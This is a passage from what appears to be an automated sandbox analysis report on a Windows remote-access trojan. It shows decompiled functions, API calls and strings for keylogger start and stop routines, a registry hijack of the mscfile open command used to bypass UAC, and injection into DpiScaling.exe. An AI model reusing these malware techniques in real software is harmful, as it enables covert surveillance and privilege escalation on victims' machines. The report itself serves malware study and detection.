0x105acd30
0x105acd21
0x105acd27
0x105acd2a
0x00000000
0x00000000
0x00000000
0x105acd2a
0x105acd04
0x105acd0c
0x00000000
0x00000000
0x00000000
0x00000000
0x105acd0c
0x105acc1f
0x105acc21
0x105acc24
0x105acc24
0x105acc26
0x105acc27
0x105acc2b
0x00000000
0x105acc2b
0x105acc18
0x00000000
0x105acc18
0x105acbfd
0x105acbff
0x105acc02
0x105acc02
0x105acc04
0x105acc05
0x105acc09
0x00000000
0x105acc93
0x105acc95
0x105acc96
0x105acca0
0x105acca8
0x105accac
0x105accb5
0x105accbc
0x105accc1
0x00000000

APIs

_strstr.LIBCMT ref: 105ACBF0
_strncpy.LIBCMT ref: 105ACC39
_strstr.LIBCMT ref: 105ACD21

Strings

TLS_AES_128_GCM_SHA256, xrefs: 105ACBAB, 105ACBBF, 105ACBD7, 105ACBED, 105ACC33, 105ACC37

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: _strstr$_strncpy
String ID: TLS_AES_128_GCM_SHA256
API String ID: 1902495667-731435280
Opcode ID: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
Instruction ID: ed65eee740b7bb4582c9e20e1fcabfdf1242b38b22434af9977a3c819443c17d
Opcode Fuzzy Hash: ea8a7ab8cc127f14d7f4bdee85ec441469228f4643ac61493a581d54cb0a109c
Instruction Fuzzy Hash: 5C517775D0428EDBDF00CEA889957AEBFB8DF80250F14447ADC99AB241E6719D02C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00446969, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON

Download Yara Rule

APIs

_strpbrk.LIBCMT ref: 004469B8
_free.LIBCMT ref: 00446AD5

Part of subcall function 0043698A: IsProcessorFeaturePresent.KERNEL32(00000017,0043695C,00000000,00000000,?,0046C518,0040D10E,00000000,?,?,0043697C,00000000,00000000,00000000,00000000,00000000), ref: 0043698C
Part of subcall function 0043698A: GetCurrentProcess.KERNEL32(C0000417), ref: 004369AE
Part of subcall function 0043698A: TerminateProcess.KERNEL32(00000000), ref: 004369B5

Strings

., xrefs: 00446C8C
*?, xrefs: 004469AC

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
String ID: *?$.
API String ID: 2812119850-3972193922
Opcode ID: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction ID: 2df9b6113c9c77aaef819b405c4b5e21061328770e73cee352be1be1b5cbe390
Opcode Fuzzy Hash: 137a9f4ad955f4626591eb4d424c202b9ba50c1f2292fbc06302f1bc433b3f7a
Instruction Fuzzy Hash: 9A51C5B1E00109AFEF14CFA9C841AAEB7B5EF4A314F25816EE454F7300E6799E018B55

Uniqueness

Uniqueness Score: -1.00%

Function 0043CC8A, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0043CCCA
_free.LIBCMT ref: 0043CD95
_free.LIBCMT ref: 0043CD9F

Strings

C:\Windows\SysWOW64\DpiScaling.exe, xrefs: 0043CCC1, 0043CCC8, 0043CCF7, 0043CD2F

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\DpiScaling.exe
API String ID: 2506810119-2099798370
Opcode ID: 92f7cb10a7bdc115734ddf1c20ecddb35b9596ec14b5ff75e0495db2788af7b4
Instruction ID: bf722257b00b3e8486653b7f0e6653974d643c05292d003de6ed1df5b48ba110
Opcode Fuzzy Hash: 92f7cb10a7bdc115734ddf1c20ecddb35b9596ec14b5ff75e0495db2788af7b4
Instruction Fuzzy Hash: DD318F71A00218AFDB21DF99D8C199EBBBCEB89314F10507BF905E7211D7B88A41CB99

Uniqueness

Uniqueness Score: -1.00%

Function 10595D08, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10595D08(void* __ecx, intOrPtr _a4, char _a8) {
				struct _SYSTEMTIME _v20;
				char _v44;
				char _v68;
				void* __ebx;
				void* __edi;
				intOrPtr _t66;
				void* _t68;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x50)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t66 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x46bb03;
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E1059569C(__eflags, E10592E03(E105961B1(0x45f5ec,  &_v44, E10592EF2(0x45f5ec,  &_v68, 0x45f5ec), _t66, __eflags, 0x45f5cc)), _v20.wHour & 0x0000ffff);
						E10592E35();
						E10592E35();
						_push(_t66);
						_push(_v20.wMilliseconds & 0x0000ffff);
						_push(_v20.wSecond & 0x0000ffff);
						_push(_v20.wMinute & 0x0000ffff);
						E1059569C(__eflags, E10592E03(E105961B1(0x45f5ec,  &_v68, E10592EF2(0x45f5ec,  &_v44, 0x45f5ec), _t66, __eflags, 0x45f608)), _v20.wHour & 0x0000ffff);
						E10592E35();
						E10592E35();
					}
				} else {
					 *((char*)(__ecx + 0x64)) = 1;
				}
				 *((intOrPtr*)(_t68 + 0x5c)) = _t66;
				 *((char*)(_t68 + 0x50)) = 1;
				 *((intOrPtr*)(_t68 + 0x54)) = CreateEventA(0, 0, 0, 0);
				CreateThread(0, 0, 0x40518a, _t68, 0, 0);
				return 1;
			}

0x10595d10
0x10595d17
0x10595e10
0x00000000
0x10595e10
0x10595d21
0x10595d24
0x10595d2f
0x10595d36
0x10595d40
0x10595d4d
0x10595d57
0x10595d5c
0x10595d80
0x10595d8b
0x10595d93
0x10595d9f
0x10595da0
0x10595da5
0x10595daa
0x10595dce
0x10595dd9
0x10595de1
0x10595de1
0x10595d26
0x10595d26
0x10595d26
0x10595de6
0x10595def
0x10595e03
0x10595e06
0x00000000

APIs

GetLocalTime.KERNEL32(?), ref: 10595D40
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10595DF3
CreateThread.KERNEL32(00000000,00000000,0040518A,?,00000000,00000000), ref: 10595E06

Strings

%02i:%02i:%02i:%03i [Info] , xrefs: 10595D52, 10595D67, 10595DB5

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: %02i:%02i:%02i:%03i [Info]
API String ID: 2532271599-1582603680
Opcode ID: ed2aae772cc8f56d28f4b74824591d144166608f12248c5c95cf11805e0c9a5f
Instruction ID: cdbe68ba7170c0f2c3dbe4bbb69218ae0f771ecc668f560d4e14a3632c6f2218
Opcode Fuzzy Hash: ed2aae772cc8f56d28f4b74824591d144166608f12248c5c95cf11805e0c9a5f
Instruction Fuzzy Hash: 8031C475804258BACB10DBA5DC4DEFFBFBCEF99755F00005AF841A2141EA78AA49D770

Uniqueness

Uniqueness Score: -1.00%

Function 00417F10, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00418005

Part of subcall function 00410AA7: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 00410AB6
Part of subcall function 00410AA7: RegSetValueExA.KERNELBASE(?,00460614,00000000,?,00000000,00000000,0046C518,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410ADE
Part of subcall function 00410AA7: RegCloseKey.ADVAPI32(?,?,?,0040D161,00460614,3.2.1 Pro), ref: 00410AE9

Strings

WallpaperStyle, xrefs: 00417F50, 00417F83, 00417FD3
Control Panel\Desktop, xrefs: 00417F4B, 00417F7E, 00417FCE
TileWallpaper, xrefs: 00417FEF

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateInfoParametersSystemValue
String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
API String ID: 4127273184-3576401099
Opcode ID: 1285ab78602569965eea0b6c37ee3638e66d325cccc752a3e8df19547cf9357c
Instruction ID: 364028c2a8d60347ed12ecbe1441f09d0bbbc2a6d5f2fe163c717d7df2f4b183
Opcode Fuzzy Hash: 1285ab78602569965eea0b6c37ee3638e66d325cccc752a3e8df19547cf9357c
Instruction Fuzzy Hash: 9711A532B8474173D818303A4E5BBAF28219746B55F60016BFA462F2C6E8CE4AC742DF

Uniqueness

Uniqueness Score: -1.00%

Function 1059A38C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E1059A38C(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				E10592EF2(__ebx,  &_v28, 0x45f9f4);
				_t31 = _t30 - 0x18;
				E105A8148(_t31,  &_v28);
				E1059A4A2(__ebx, _t29, _t35);
				E10592E35();
				_t32 = _t31 - 0x18;
				E10592EF2(__ebx, _t31 - 0x18, 0x45f9f4);
				E10592EF2(_t19, _t32 - 0x18, "[Info]");
				E105A7AEE(_t19, 0x45f9f4);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}

0x1059a38c
0x1059a393
0x1059a396
0x1059a39a
0x1059a40f
0x00000000
0x1059a40f
0x1059a3a5
0x1059a3aa
0x1059a3b2
0x1059a3b9
0x1059a3c1
0x1059a3c6
0x1059a3cc
0x1059a3db
0x1059a3e0
0x1059a3e8
0x1059a3ef
0x1059a3f9
0x1059a402
0x1059a408
0x1059a408
0x00000000

APIs

Part of subcall function 1059A4A2: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 1059A4B0
Part of subcall function 1059A4A2: wsprintfW.USER32 ref: 1059A531
Part of subcall function 1059A4A2: SetEvent.KERNEL32(00000000,00000000), ref: 1059A55B

Part of subcall function 105A7AEE: GetLocalTime.KERNEL32(00000000), ref: 105A7B08

CloseHandle.KERNEL32(?), ref: 1059A3EF
UnhookWindowsHookEx.USER32 ref: 1059A402

Strings

Online Keylogger Stopped, xrefs: 1059A39C, 1059A3A4, 1059A3CB
[Info], xrefs: 1059A3D6

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: 081abe773b2ee0a309f9428bed4f9822964ed0b3ac3228fff158157ab83d7dbd
Instruction ID: 7e1d4f0a4cd82f972439fa908e339998fde8f62e22a418ec7004ab0047c5e293
Opcode Fuzzy Hash: 081abe773b2ee0a309f9428bed4f9822964ed0b3ac3228fff158157ab83d7dbd
Instruction Fuzzy Hash: C6014C34A042205BCF117B34CC0F7BE7F75DB81241F80045DE84602591DBA5285BD3E6

Uniqueness

Uniqueness Score: -1.00%

Function 0040951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 00409634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 00409642
Part of subcall function 00409634: wsprintfW.USER32 ref: 004096C3
Part of subcall function 00409634: SetEvent.KERNEL32(?,00000000), ref: 004096ED

Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A

CloseHandle.KERNEL32(?), ref: 00409581
UnhookWindowsHookEx.USER32 ref: 00409594

Strings

[Info], xrefs: 00409568
Online Keylogger Stopped, xrefs: 0040952E, 00409536, 0040955D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
Instruction ID: 0bb2a425696eaad1e840e03cb6b1d67cba19ac7ec2a577a4888382e5ddaa93e6
Opcode Fuzzy Hash: fa00e6ca810f7b458d358df112eb891d89e38a820840c17ff32a5804d1cb9a30
Instruction Fuzzy Hash: 6201F5316002016BD7267B29CC0B7BE7BB58B42305F80006EE981221D3EBBD595AC7DE

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040C119

Strings

ios_base::failbit set, xrefs: 0040C0FB
ios_base::eofbit set, xrefs: 0040C108
ios_base::badbit set, xrefs: 0040C0D5

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction ID: fbfdbc6450803e664eb4f4f41a0da8e4bd286e2513790d23a86e9e7a09bff230
Opcode Fuzzy Hash: 92f0f012ab8be239e50056247fdc818a5de3ea501611d2d121b0742182c93af8
Instruction Fuzzy Hash: 5C01A770644208EAD714E791CC93FBB73549B10744F60853BBE01791C3EA7C5542CA5F

Uniqueness

Uniqueness Score: -1.00%

Function 105A189E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E105A189E(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v12;
				char _v1040;
				long _t17;

				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12);
				if(_t17 != 0) {
					goto L3;
				}
				E105968EA( &_v1040, _a16, _a20);
				E10596971( &_v1040, _a8, _a12);
				return 1;
			}

0x105a18c2
0x105a190e
0x00000000
0x105a190e
0x105a18d3
0x105a18de
0x105a18e6
0x00000000
0x00000000
0x105a18f4
0x105a1905
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 105A18BA
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 105A18D3
RegCloseKey.ADVAPI32(00000000), ref: 105A18DE

Strings

origmsc, xrefs: 105A18AA

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: origmsc
API String ID: 3677997916-68016026
Opcode ID: 9d7db8807d8695e9d09ea315ff22da239e7ce6c047d71957a7315fb76c5a32cb
Instruction ID: 120787d0aca265dba654f0db1f0873f9620f41a144be19236c7eed1a3ba82976
Opcode Fuzzy Hash: 9d7db8807d8695e9d09ea315ff22da239e7ce6c047d71957a7315fb76c5a32cb
Instruction Fuzzy Hash: 0D01283640022DFBCF119FA0DC09DEF7F69EB05692F004161BA0862060D6318A69EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410978
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410993
RegCloseKey.ADVAPI32(00000000), ref: 0041099C

Strings

http\shell\open\command, xrefs: 0041096E

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction ID: 1fd5564dc1120aea69868d5849519b592669f7fe773aa548349f028f89f009b1
Opcode Fuzzy Hash: 6e92095d02e46624d881629d473bbed2b7895e2f1f32a5b9a2dde9abf283c6c6
Instruction Fuzzy Hash: 79F0C871500208FBDB10DA95EC09EDFBBBCEB84B52F1040A6B944E1151DA749B85C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 105A19BA, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E105A19BA(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E105932F7();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E10592D59( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				E10592D5E();
				return _t23;
			}

0x105a19bd
0x105a19be
0x105a19cd
0x105a1a0d
0x105a19cf
0x105a19d3
0x105a19f4
0x105a19ff
0x105a1a08
0x105a1a08
0x105a1a12
0x105a1a1d

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 105A19C5
RegSetValueExW.ADVAPI32(?,0045F724,00000000,00000000,00000000,00000000,0045F724,?,80000001,?,10596E8E,0045F724,C:\Windows\SysWOW64\DpiScaling.exe), ref: 105A19F4
RegCloseKey.ADVAPI32(?,?,80000001,?,10596E8E,0045F724,C:\Windows\SysWOW64\DpiScaling.exe), ref: 105A19FF

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 105A19C3

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: e3a62b1ecaaca373f1a47cc8b280a2c9c668bc0187830e578af04c97b0f4d5a2
Instruction ID: b3db8f9458e85983fc0cb2e0e36dce7299c7c7787673249df303d25b0e3aa808
Opcode Fuzzy Hash: e3a62b1ecaaca373f1a47cc8b280a2c9c668bc0187830e578af04c97b0f4d5a2
Instruction Fuzzy Hash: AFF04F76441218FBCF009FA0EC09EEE3B6CEB44692F104558B90596165E631EF15DA94

Uniqueness

Uniqueness Score: -1.00%

Function 004013AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013B7
GetProcAddress.KERNEL32(00000000), ref: 004013BE

Strings

User32.dll, xrefs: 004013B2
GetCursorInfo, xrefs: 004013AD

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction ID: 2d5915eac24d434730a095519f9524ab5112888a720461ae5624eff83defc800
Opcode Fuzzy Hash: 7977a5557b776f61f264f3e489a064094cdfaca646ab3a6ed5e8a62dd2d62907
Instruction Fuzzy Hash: AAB092B0582B10ABC6007FA0AD0D9087AB4E658B43B2000B3B102C39E5EBB881209F1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00401472
GetProcAddress.KERNEL32(00000000), ref: 00401479

Strings

GetLastInputInfo, xrefs: 00401468
User32.dll, xrefs: 0040146D

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction ID: efdeec6c1e0f4d8d8c2c1c08f07324648747689b8805d4bbb4dbcfd19e195539
Opcode Fuzzy Hash: 061009d7c2b90945a6648eacf09c202092d3b15d3df962e76e333c2cd1922b96
Instruction Fuzzy Hash: F8B092B05427049BC740AFF0AC4DA087A78B644F43B1001A6F142825E9EBB88110AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0040148F
GetProcAddress.KERNEL32(00000000), ref: 00401496

Strings

GetConsoleWindow, xrefs: 00401485
kernel32.dll, xrefs: 0040148A

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction ID: d846cdfbb623d578af620becd0756bbfaced08f68ce80228df047fade16f1a3c
Opcode Fuzzy Hash: 2f40303a78aba9bee768f751903e191da351897d6f773a22111597fdc6b84b83
Instruction Fuzzy Hash: D6B092B05433049BC7509FB0AE5DA097B79A604F87B1000A6F641821E9EEB881009A2F

Uniqueness

Uniqueness Score: -1.00%

Function 00443812, Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044389D
__alldvrm.LIBCMT ref: 00443A9E
__alldvrm.LIBCMT ref: 00443AC0

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction ID: 66ba9c3cc4a36ed88c16bb93380f7ac1aac5537698642897c3979fdba8336104
Opcode Fuzzy Hash: 9d124845995ada22dcd12b1ab66e5f28888bf71f56cbd97164ef69fdac796ab1
Instruction Fuzzy Hash: A0A14672A403869FFB11CE18C8817AEBBE1EF15756F18416FE485AB382C27C9E45C758

Uniqueness

Uniqueness Score: -1.00%

Function 0045029A, Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004503C9

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
Instruction ID: ec6e5165c6e0660f46293b9fdcc1e9d4cfa0c4fde508876c15d21b96f536f29c
Opcode Fuzzy Hash: 831bbabb277ed683657504183459677247b461b82b5b035bb98d9dc5ede02f09
Instruction Fuzzy Hash: A9417D35A00500ABDB206FBA8C45A6F3BA4EF45376F14065FFC18D7293D67C8815866E

Uniqueness

Uniqueness Score: -1.00%

Function 105CD2EF, Relevance: 6.1, APIs: 4, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E105CD2EF(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E105CD43C(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E105E1A2E(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x4591d8;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x4591a4;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E105E1A2E( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E105E1A2E(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E105E1A2E(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E105CB372();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E105CB372();
					_t102 = 0x16;
					 *_t69 = _t102;
					E105C77CB();
					goto L11;
				}
				_t71 = E105CB372();
				_t103 = 0x16;
				 *_t71 = _t103;
				E105C77CB();
				return _t103;
			}

0x105cd2f8
0x105cd2fd
0x105cd31d
0x105cd31e
0x105cd320
0x105cd323
0x105cd325
0x105cd338
0x105cd33b
0x105cd33d
0x105cd340
0x105cd343
0x105cd346
0x105cd351
0x105cd353
0x105cd354
0x105cd356
0x105cd372
0x105cd376
0x105cd37f
0x105cd384
0x105cd38b
0x105cd398
0x105cd39d
0x105cd3a7
0x105cd3ac
0x105cd3b1
0x105cd3b3
0x105cd3ba
0x105cd3bc
0x105cd3bc
0x105cd3c1
0x105cd3c6
0x105cd3c7
0x105cd3ca
0x105cd3d2
0x105cd3d2
0x105cd3d3
0x105cd3e1
0x105cd3e9
0x105cd3f6
0x105cd3f7
0x105cd401
0x105cd407
0x105cd411
0x105cd418
0x105cd41c
0x105cd420
0x105cd425
0x105cd429
0x105cd431
0x105cd431
0x105cd433
0x105cd436
0x00000000
0x105cd3cc
0x105cd3cc
0x105cd3cc
0x105cd3cd
0x105cd3cd
0x00000000
0x105cd3cc
0x105cd3ca
